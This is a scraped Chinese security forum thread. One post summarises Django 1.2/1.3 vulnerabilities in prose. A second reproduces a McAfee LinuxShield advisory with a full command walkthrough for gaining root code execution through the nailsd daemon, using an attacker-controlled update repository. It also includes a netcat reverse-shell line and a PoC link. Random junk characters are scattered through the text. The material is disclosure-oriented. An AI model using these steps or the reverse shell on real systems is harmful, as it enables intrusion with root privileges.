最近看过此主题的会员

返回列表 发帖
Django开发框架多个安全漏洞
发布时间: 2011-09-12

- f& @% d5 Y$ L% ]
影响版本:6 e/ b9 X+ m5 r0 e: b* O5 o
Django 1.2.5$ ?) x. K; `0 S! g8 D
Django 1.3 beta 1
$ \3 n6 S3 L" W3 YDjango 1.2.4
9 S& c* A8 A# d, ^2 S' R8 cDjango 1.2.2
0 C' y; }! h9 e& Q2 ZDjango 1.2

* j0 P1 h3 E3 N2 E. I% b
漏洞描述:
5 q7 S4 k& Z% }4 m8 b+ p
Django是一款开放源代码的Web应用框架,由Python写成。: [: Y; ~6 O0 \2 I( E8 z# B6 i; a+ \
Django存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。& n& q, J! K5 W
1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。3 j, S5 `0 ]: B0 F/ b
2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。
: O7 |( j3 w, x4 V- I$ }3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。* z, O8 W. ^  h9 G6 G. |; `
4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。

; X' Q) N7 _) f# U0 v" B9 l; {
细节参考:
5 U* J% Z+ |0 u( q* x: Chttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
3 G" h, }1 c7 f2 g' j9 |; Nhttp://secunia.com/advisories/45939/

( R" V4 i. H5 n- ~8 v

( Q9 B, _2 R. P# S# l" Z, g! x  n
: }: q# Y. f( w! c% b
! B+ j- A; n. Q

/ i2 `& _1 M2 o5 R: p+ q/ Y  c4 [5 c: d) z% v4 j: K
4 `3 A, Y; ?: f, o; s

. u5 u& Y2 w/ ]% R, D6 ^4 f/ l4 p) C
4 N* M; C' k* m/ j% X$ k

* ~  o* _$ f+ g3 V" q
3 j* u" T8 j7 i3 v9 O# r7 l
; S4 o& \4 r4 g# V, e2 I# ^% x& n7 J3 {5 X3 W6 G. {- ^8 p' D

1 h6 G; H3 ?! J$ D" y
5 g" u( l2 X2 d5 C- \5 e, z5 a$ }( U2 h5 r

3 _; k; n8 e  X) v0 X0 u% r4 f0 ^" ~: f
公告:https://www.sitedirsec.com公布最新漏洞,请关注

 

您可能还想看的主题:

启明星辰招聘

TOP

McAfee LinuxShield 本地/远程代码执行漏洞
McAfee LinuxShield remote/local code
; X8 |  b% `4 D  |  K% n8 }& J影响版本: McAfee LinuxShield <= 1.5.1
" {- z  P) f* p- G0 @4 w/ I远程攻击: Yes 9 K: m* R+ t7 K) V+ I
本地溢出: Yes* Y( ?  ]  ]* U: W1 f' |) m
背景阅读:
+ g* E% m& i1 a+ x3 `4 R6 ]===========
% C! F4 M) M. \3 |: X( j
% m  x5 A  x$ u# r9 x" pLinuxShield detects and removes viruses and other potentially unwanted
( {$ b& U; V1 k" q' Asoftware on Linux-based systems. LinuxShield uses the powerful McAfee/ {  u, n4 M" [: T
scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our
% m- a/ o' ?- W* V& c  janti-virus products.
" ?/ B9 N1 b, q8 r/ b. n9 A! Q
$ M; ~6 @- S6 a. w8 QAlthough a few years ago, the Linux operating system was considered a1 \) X6 J) W: i
secure environment, it is now seeing more occurrences of software
! P* W  o3 U7 F' J/ v- A2 C$ Hspecifically written to attack or exploit security weaknesses in$ z4 j4 V3 _. |6 x
Linux-based systems. Increasingly, Linux-based systems interact with
4 u& c) B+ `6 `6 ?; f) ]Windows-based computers. Although viruses written to attack Windows-& g  {- W% E, ]1 N# H$ O
based systems do not directly attack Linux systems, a Linux server- n: J3 v3 K4 |7 L7 ~. U: ]1 R
can harbor these viruses, ready to infect any client that connects to
4 I) V4 F% H' v# Q2 Hit.- E5 O! Q+ I- h9 H0 Q* v  B3 T9 e
* |) B* P& K1 h
When installed on your Linux systems, LinuxShield provides protection
& v4 R$ z: @+ K5 Q5 kagainst viruses, Trojan horses, and other types of potentially; ^+ F' _) s) d  `! T5 w9 `; i, s
unwanted software.( k% ]7 l, S" b$ K/ K0 A# k

3 s5 x, f. M, r( C3 m1 R6 P5 w, HLinuxShield scans files as they are opened and closed
6 @) A4 M7 P4 C3 q$ v# |1 ~( m?&amp;#65533;&amp;#65533; a technique
# l: E( Y- _9 Z# S; g+ b0 Bknown as on-access scanning. LinuxShield also incorporates an
0 w+ c9 y6 t4 S( P: \8 e7 ?on-demand scanner that enables you to scan any directory or file in) h. z6 M+ b- N+ d1 F; f
your host at any time.
1 \; _; F" N6 V" |: e
0 R- C' E1 j5 Q+ q4 dWhen kept up-to-date with the latest virus-definition (DAT) files,, D, O2 z' `* W2 I- L
LinuxShield is an important part of your network security. We
0 f( u% E) P# C, J3 qrecommend that you set up an anti-virus security policy for your9 Z1 K& x3 R1 |  ?
network, incorporating as many protective measures as possible.
* \9 c8 {8 [% h8 F1 a
' C" O0 ?5 |2 U  Y% O/ \: kLinuxShield uses a web-browser interface, and a large number of
- U& A" X5 M" O" OLinuxShield installations can be centrally controlled by ePolicy
, R: z' u+ k! D( k. x" j- _Orchestrator.1 Z% n( n) Z: }5 ]9 S& P* [
5 M+ J: Q* `3 l9 z
(Product description from LinuxShield Product Guide)
3 E: H8 z7 t3 b" g) M) `
- S0 @7 D3 w/ Y' m8 P8 j9 b6 j! E6 o

8 p" _! \$ w4 Y6 Y- O& _Description:
% D( W5 U" O7 `+ [============  a, ?0 D, u, m' G
8 d& c9 _5 D; e0 ?" H  \5 n
This vulnerability allows remote attackers to execute arbitrary code; }  Z7 n* H6 D  p5 N
on vulnerable installations of McAfee LinuxShield. User interaction) w1 H; m1 k6 n! r, b) F6 S) ~
is not required to exploit this vulnerability but an attacker must
: H3 ]% j, G. t, ]8 Q: mbe authenticated." S, H; r' T, t, p

! `. P" D: \# w2 fThe LinuxShield Webinterface communicates with the localy installed8 f5 H# k2 d) P1 J4 y
"nailsd" daemon, which listens on port 65443/tcp, to do
1 d( z$ n% \* g- l4 q% M( a9 }configuration+ G3 ^2 A. D; Y$ [5 v+ B1 X
changes, query the configuration and execute tasks.. L  B8 i! U) X5 M  b
) J3 t1 g7 j7 N2 g" M/ ^; T
Each user, which can login to the victim box, can also authenticate
9 g7 U; K: `+ S* c5 z/ q) z" p4 Xit self to the "nailsd" and can do configuration changes and
* J4 s. u2 c+ Jexecute
  [$ p( T9 f+ z. ptasks with root privileges.+ S0 P/ `4 h5 @/ N4 _2 s
1 d( |2 c+ o- g
A direct execution of commands is not possible, but it is possible to
7 k5 h9 e( j' F" f5 V/ ldownload and execute code through manipulation of the config and
' O! k. Y. W, A7 }# gexecute schedule tasks of the LinuxShield.& D9 j4 h* X2 q8 f5 G) a, D
7 X, y# J! L9 A% X. Z5 W

2 O2 ^, s; r! h9 W; U: ?walk-through (after the TLS handshake):* S& s# @2 X% |! {- Q" C; \! q6 [
+--------------------------------------
* q# |- E% ~6 l4 M/ M3 f8 v* z, {8 w4 `
nailsd > +OK welcome to the NAILS Statistics Service1 b1 x: D5 e: C1 t4 ]9 X1 E
attacker> auth <user> <pass>+ f3 l6 z- U+ o; Q
nailsd > +OK successful authentication
* n% j/ b2 M# \! j: P" Q. L. N9 O3 O8 I, \9 [8 @' L
# Set the Attacker repository to download our code from a httpd
; A$ T& Q- G# Q$ ~6 e9 Y/ H# (catalog.z)
1 r  N7 F) k1 n3 {5 c) w/ f: P: [) v5 f#---------------------------------------------------------------& W) _6 S, U6 i. n( U
attacker> db set 1 _table=repository status=1 siteList=<?xml version) N2 G' \. U4 {' N  `; C
="1.0" encoding="UTF-8"?><ns:SiteLists
) `+ M* Y! n  F: a# v5 a1 Mxmlns:ns="naSiteLi
( ?) k: g: o+ u% p/ k7 o. Hst" GlobalVersion="20030131003110") J1 T, Z" {; z
LocalVersion="20091209
8 A( s9 d; x9 u4 ]4 ~161903" Type="Client"><SiteList) C- r/ g  T. ?& W2 Y
Default="1" Name="SomeGU
$ p) Z, v# q! R6 g# ]( P4 hID"><HttpSite Type="repository"/ j3 ^4 G) ^+ K8 K
Name="EvilRepo" Order="1
) a. S1 E0 T7 H. B. f  Q/ O) L" Server="<attackerhost>:80"/ A& Z7 e. A7 ?% _% v% y6 y, ?
Enabled="1" Local="1"><Rela& x3 a/ G( D4 O1 l. q  N; c

1 t% e1 c% Q7 _0 y- s- ~tivePath>nai</RelativePath><UseAuth>0</UseAuth><Use% B0 o; k6 `2 a1 M$ g
rName></
$ @8 U: U9 x6 A+ l0 VUserName><Password0 X6 E, c" o1 I  f$ O  u( K7 L
Encrypted="0"/></HttpSite></SiteList></- _/ D4 r9 w$ G3 F8 j# H
ns:SiteLists> _cmd=update& N" m1 H+ E6 r& z9 K
nailsd > +OK database changes buffered.- o2 ~% G9 r: C6 I

+ S+ T- \, H0 H3 k# Execute task to set the attacker repository- E% H% a: ^- w1 V( q0 _. v- [# L
#---------------------------------------------------------------
& n3 ?& o  t; h/ a' K- Jattacker> task setsitelist
4 ?. `' {9 p" n% _2 ]7 X; }nailsd > +OK setting sitelist from CMA.
- O4 {/ h0 M( `" M5 d$ T5 J' x0 L' q6 T  J; i# z
# Execute the default Update task to download the code, n4 |+ _7 k& v8 `( z* D
#---------------------------------------------------------------
7 |5 H( K0 T) S3 T7 p3 Qattacker> task nstart LinuxShield Update
  t4 o8 H9 F1 U2 ~nailsd > +OK task LinuxShield Update starting) A* \! ]9 D/ h9 U. l" Q  N

% W: v/ G5 `5 P; U! c+ l: w# Create a Scan profile, which executes our code. The profiles are
% H! L: \0 F2 ^( x" t& i# not stored in the database.
, p5 A3 ?5 a2 V# Scan Profiles: /var/opt/NAI/LinuxShield/etc/ods.cfg; }8 r6 [$ [, K& A$ p" f
#---------------------------------------------------------------
' R- \  V4 R% nattacker> sconf ODS_99 begin
5 N3 S$ f& j0 z1 M" k5 L+ Gnailsd > +OK 1260400888
# F7 g, |: G; w2 o5 n3 {& d) H" V0 k. ?' ^+ k1 U
# Set the variable "nailsd.profile.ODS_99.scannerPath" to the
; _, [! ?2 O* A. @path
  s9 Y' y' _4 k0 V5 Z5 v$ j% `# where our earlier downloaded catalog.z file is stored.( j+ n8 u+ W1 a0 @
# (/opt/McAfee/cma/scratch/update/catalog.z)
" F! C8 G  t$ L#---------------------------------------------------------------
5 H5 ~+ n9 ]+ [0 L0 Eattacker> sconf ODS_99 set 1260400888 nailsd.profile.ODS_99.allFiles=
9 s6 a0 Y. \* _# K& s1 Q2 A: ^, ptrue nailsd.profile.ODS_99.childInitTmo=60 nailsd.profile.O  I+ D- {3 s& {* t- n) n
DS_99.cleanChildren=2 nailsd.profile.ODS_99.cleansPerChild=
% V) N+ u9 g" P( V! r( G9 {10000 nailsd.profile.ODS_5.datPath=/opt/NAI/LinuxShield/eng
$ O- V3 J4 @. N5 F1 ]" wine/dat nailsd.profile.ODS_99.decompArchive=true nailsd.pro5 c  ^2 v- W" c, Z/ P
file.ODS_99.decompExe=true nailsd.profile.ODS_99.engineLibD
! H1 ]7 S$ K/ Z. g' s- pir=/opt/NAI/LinuxShield/engine/lib nailsd.profile.ODS_99.en
) _1 X2 g4 l& DginePath=/opt/NAI/LinuxShield/engine/lib/liblnxfv.so nailsd2 f+ O# d. T/ w
.profile.ODS_99.factoryInitTmo=60 nailsd.profile.ODS_99.heu
- P; i, D, z9 O! p/ T" x1 U: ?risticAnalysis=true nailsd.profile.ODS_99.macroAnalysis=tru
! \+ Q( P8 X) ]9 Le nailsd.profile.ODS_99.maxQueSize=32 nailsd.profile.ODS_994 m3 V' V7 _6 V# E. P+ J, X" l
.mime=true nailsd.profile.ODS_99.noJokes=false nailsd.profi
) s! ~. {0 b& X; j6 kle.ODS_99.program=true nailsd.profile.ODS_99.quarantineChil% V! K- S$ b! F- s/ L
dren=1 nailsd.profile.ODS_99.quarantineDirectory=/quarantin* v/ V# o: Y6 e$ w& D8 q( J0 Q
e nailsd.profile.ODS_99.quarantinesPerChild=10000 nailsd.pr& N6 P. t0 K$ I" G* T: N& y
ofile.ODS_99.scanChildren=2 nailsd.profile.ODS_99.scanMaxTm( ^1 \) y4 V8 E$ x
o=301 nailsd.profile.ODS_99.scanNWFiles=true nailsd.profile
' g5 j: n+ M2 K- L# `.ODS_99.scanOnRead=true nailsd.profile.ODS_99.scanOnWrite=t% U6 T" J& q( a
rue nailsd.profile.ODS_99.scannerPath=/opt/McAfee/cma/scrat# ^. v  X4 h3 q2 j  K
ch/update/catalog.z nailsd.profile.ODS_99.scansPerChild=100
& M& C2 A+ \5 m  K' I& D+ f00 nailsd.profile.ODS_99.slowScanChildren=0 nailsd.profile.0 G; `7 B, P2 M) A5 z' Z
ODS_99.filter.0.type=exclude-path nailsd.profile.ODS_99.fil
/ e' S/ u% w$ P' k' y1 |) jter.0.path=/proc nailsd.profile.ODS_99.filter.0.subdir=true' c' w/ _' Z' |' _
nailsd.profile.ODS_99.filter.extensions.mode=all nailsd.pr
4 U4 b9 s/ L( `ofile.ODS_99.filter.extensions.type=extension nailsd.profil% }- \& y, W4 E  L; D; [
e.ODS_99.action.Default.primary=Clean nailsd.profile.ODS_993 @; e/ z4 f. t2 Y6 |
.action.Default.secondary=Quarantine nailsd.profile.ODS_99.' k. a5 G' {0 A' @' {' @
action.App.primary=Clean nailsd.profile.ODS_99.action.App.s
0 i6 f% g3 L! O$ secondary=Quarantine nailsd.profile.ODS_99.action.timeout=Pa* _, I2 ]+ D5 G( f
ss nailsd.profile.ODS_99.action.error=Block
; b$ b, Y' V. j3 Fnailsd > +OK configuration changes buffered4 H* O- w$ x5 o- s9 g
attacker> sconf ODS_99 commit 1260400888; v2 V% _9 w: A' v* o
nailsd > +OK configuration changes stored; f( Q+ c4 a$ {9 r/ A

: r, H3 p0 e1 ~) V& `# Set a scan task with the manipulated profile to execute the code
; Z  `# y6 }( i+ a% R1 h: k# l#---------------------------------------------------------------
( _- Z- g$ u0 ^$ ^! V" C5 o8 sattacker> db set 1260400888 _table=schedule taskName=Evil Task taskTy; ]0 _! W- i0 w  f& o6 H/ f7 Y# q7 k
pe=On-Demand taskInfo=profileName=ODS_99,paths=path:/root/t
1 Z  A( e7 L& v7 G2 y6 pmp;exclude:false timetable=type=unscheduled taskResults=0 i+ F1 n5 M  W/ s+ f9 z/ `
_lastRun=1260318482 status=Stopped _cmd=insert/ S# ], y% u3 N# E
nailsd > +OK database changes buffered: A, I+ I: p4 \& Q  O* r1 z
6 o+ d- I$ P+ M- K9 e% L
# Execute scan task to execute the code
9 b  z8 B8 P2 u. I5 q) V#---------------------------------------------------------------
5 B4 _+ c: M2 u; l0 \2 Z& B  Lattacker> task nstart Evil Task% I2 L3 B1 I+ f

7 S$ Y; d8 A" ~$ {  S+-------------------------------------- walk-through EOF% ^" p8 _  \8 @- P, }9 W: J- w

- u5 g* Y& y5 h1 Z) e( H  B$ z1 f6 a7 P3 f  @9 b0 t* N8 N* d1 M# H
To get a reverse root shell place something like this in the catalog.z
& J# z0 ^0 n; M+ F/ p3 I5 j- H) `( Q: U# ^! G2 m1 P
--- snip ---  z, @# s3 }3 j! e
#!/bin/sh
8 ~$ H& w( ?0 C  bnc -nv <attacker_host> 4444 -e /bin/sh" `/ d. ]- M( N' Q+ Z; T; L
--- /snip ---. S( ~+ X3 Y2 z# U

( [: l4 X+ A( w7 b' E& A. U  ]' |% ]5 o  K
" ]+ Z$ P" v4 K8 K' j3 o# K0 h% Y
Proof of Concept :+ `, \0 D( ?9 W- j
==================
# \' f2 \: B6 C2 _# \. m* J2 r
2 T! P3 l/ k3 C+ ]http://inj3ct0r.com/sploits/11165.tar.gz
- S8 P% }. m3 o8 \1 m9 d
  [5 H$ |# n, \: d; L; h
, P1 L# ~3 S' k. z. v& Q5 N" b
) x" `( `8 t* ~9 gSolution:9 Q9 M3 k8 q; Z
=========
: S& e! i, T1 j) N; s8 j& l# Y1 B* C  g& ~: Z" E/ ]5 ~
McAfee Advisory
' S" z$ k, ?% }) g1 O+--------------
" ~. g: W, I5 H) mhttps://kc.mcafee.com/corporate/index?page=content&amp;id=SB10007; b, o3 B- J7 Z; H) j' D
- L& O1 I8 T+ m; i+ A/ g& h& \
0 \7 D6 q. Z) j8 E/ H% A' G

" ]( n" C7 k) C9 g! S, j" r+ GDisclosure Timeline (YYYY/MM/DD):  s1 t1 u& L( p3 j5 I+ N+ j: I# l$ ^
=================================9 X# @$ T8 Y# \

, g! |( ]. Y* J2009.12.07: Vulnerability found+ j, w' Z' t! S. P* {
2010.02.03: Asked vendor for a PGP key
8 b* {- S8 K* e* h; j# ^4 r, r2010.02.05: Vendor sent his PGP key9 r/ F* h7 Y- q5 S+ r. ~) l; r
2010.02.05: Sent PoC, Advisory, Disclosure policy and planned disclosure
9 E5 y9 f' X" k0 U% ^date (2010.02.18) to Vendor
  U% Q. {" j$ S( N2010.02.05: Vendor acknowledges the reception of the advisory
. f  ^* L  `5 O, Q% n: {$ b5 I2010.02.16: Ask for a status update, because the planned release date is  n" P7 i1 _# h0 m* V; l
2010.02.18.1 o: [/ ?: T2 T* |! _
2010.02.16: Vendor response that, they are currently working on a patch4 R! {8 U* q) D% c, P1 t: N
2010.02.17: Changed release date to 2010.02.25.
# ]6 H% H/ k8 k7 Z' S$ ?2010.02.22: Vendor gives a status update, that they are able to release
1 o% l( C3 @8 B+ J: qthe patch on 2010.02.25.
9 y, R, b9 }: G. s0 k" h" Z7 ^2010.02.24: Ask for a list of affected products and the advisory url." A5 y2 j# N* _6 [
2010.02.24: Vendor sends the list.
' S$ [( W: K' }" |2 B2 U8 u- V2010.03.02: Release of this Advisory
7 m9 G8 D0 e3 `3 ?0 E% ~; H7 {: W$ ?; i0 [- R) l+ E8 ]% A

( U& [$ y' v$ f; t8 B( K$ e# h& d( F* I6 N7 O
$ ]; y# Q- D: G$ l/ q# z4 E* Z# g

. n: L& L; Y: K- ?/ w
1 P7 A; @$ ~# r4 z+ \
6 y3 H3 }( `1 B6 L- Z3 b& b: d) T; w7 J1 h

/ h- Y" R3 j8 d# a: w. `2 _+ \  A8 a: m/ e( P
: m: v5 }% L# C) U. ]

4 [: w. |% _& h) D( W& F
8 P; x/ O& w+ W3 x+ G' ~
0 s7 A& M+ P* q" a9 T1 `4 e8 j3 z% S. y. W
& D! r0 Z3 B9 a. c7 p2 r- t
  E3 r0 T5 D$ \  \! k, k

0 O  P+ p- J' r; C. G' B* x1 ~
8 h  Y$ n3 w1 Z- l! s2 L
& X  b& x4 _" v* Q6 d6 ~
6 \+ h5 B8 A/ Y7 O公告:https://www.sitedirsec.com公布最新漏洞,请关注

TOP

返回列表